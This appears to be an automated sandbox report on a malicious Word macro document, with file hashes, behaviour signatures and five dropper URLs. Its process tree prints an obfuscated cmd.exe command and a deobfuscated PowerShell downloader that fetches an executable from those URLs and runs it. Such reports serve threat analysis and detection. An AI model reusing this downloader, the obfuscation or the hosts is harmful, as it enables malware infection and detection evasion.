Analysis
-
max time kernel
23s -
max time network
23s -
platform
windows10_x64 -
resource
win10v20201028 -
submitted
08-11-2020 11:21
General
-
Target
fa964842244e752950fd4ed711759382a8950e13cc2794d6f73ab7eb9169e5ee.doc
-
Size
94KB
-
MD5
ecf475aea6d373c61244f4db7d2ee595
-
SHA1
8f20b0a73d536e74c3c55d1fa98d07ab98ef46b6
-
SHA256
fa964842244e752950fd4ed711759382a8950e13cc2794d6f73ab7eb9169e5ee
-
SHA512
e2e9852a1de72e3e8d569842899c07f0be1d0305c75ac4bfa171ffda6d7d19298da492be2b11174ffe7ab29f379a592f68e30078dffadfdf414c94433bfac087
Score
10/10
Malware Config
Extracted
Language
ps1
Deobfuscated
URLs
exe.dropper
http://cotton-world.net/as03M
exe.dropper
http://mandram.com/2MouUZ
exe.dropper
http://djteresa.net/RTKYqE
exe.dropper
http://vkontekste.net/db20
exe.dropper
http://art-nail.net/Y
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
-
Blacklisted process makes network request 4 IoCs
-
An obfuscated cmd.exe command-line is typically used to evade detection. 1 IoCs
-
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
-
Enumerates system info in registry 2 TTPs 3 IoCs
-
Suspicious behavior: AddClipboardFormatListener 2 IoCs
-
Suspicious behavior: EnumeratesProcesses 3 IoCs
-
Suspicious use of AdjustPrivilegeToken 1 IoCs
-
Suspicious use of SetWindowsHookEx 7 IoCs
-
Suspicious use of WriteProcessMemory 4 IoCs
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\fa964842244e752950fd4ed711759382a8950e13cc2794d6f73ab7eb9169e5ee.doc" /o ""1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SYSTEM32\Cmd.exeCmd /V/C"s^e^t 7^j=^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^}}{^hc^t^ac^};^kaerb;ldd$ m^e^t^I-^ekovnI^;)ldd$ ,^awS^$(e^l^i^F^da^o^lnw^o^D^.^a^T^z^${^yrt{)^jlw^$^ ni ^aw^S$(^hc^aerof;'exe^.^'^+hNF$^+^'\'+ci^l^b^up^:vne$^=l^dd$^;^'^0^1^6' = hN^F$;)'@'(^ti^lp^S.'Y/ten^.^li^an-^tra//:^ptth@^02b^d/t^en^.et^sk^etn^o^kv//:pt^t^h^@E^q^Y^KTR/t^en^.^a^s^eretj^d//:p^tth^@^Z^Uu^oM^2/^m^oc.mar^dnam//^:^p^tth@^M30^s^a/^t^en^.^dlr^o^w^-no^t^toc//^:p^t^t^h^'^=^j^lw$;^tnei^lCbe^W^.^t^eN tcejb^o^-w^en^=^a^T^z^$ ll^e^hsr^e^wop&&^f^or /^L %^b in (3^41^,-^1^,^0)d^o ^s^et K^W^a=!K^W^a!!7^j:~%^b,1!&&i^f %^b ^l^eq ^0 ca^l^l %K^W^a:^*^KW^a!^=%"2⤵
- Process spawned unexpected child process
- An obfuscated cmd.exe command-line is typically used to evade detection.
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell $zTa=new-object Net.WebClient;$wlj='http://cotton-world.net/as03M@http://mandram.com/2MouUZ@http://djteresa.net/RTKYqE@http://vkontekste.net/db20@http://art-nail.net/Y'.Split('@');$FNh = '610';$ddl=$env:public+'\'+$FNh+'.exe';foreach($Swa in $wlj){try{$zTa.DownloadFile($Swa, $ddl);Invoke-Item $ddl;break;}catch{}}3⤵
- Blacklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
-
Filesize
9.9MB
-
Filesize
4KB
-
Filesize
4KB
-
-
Filesize
6.2MB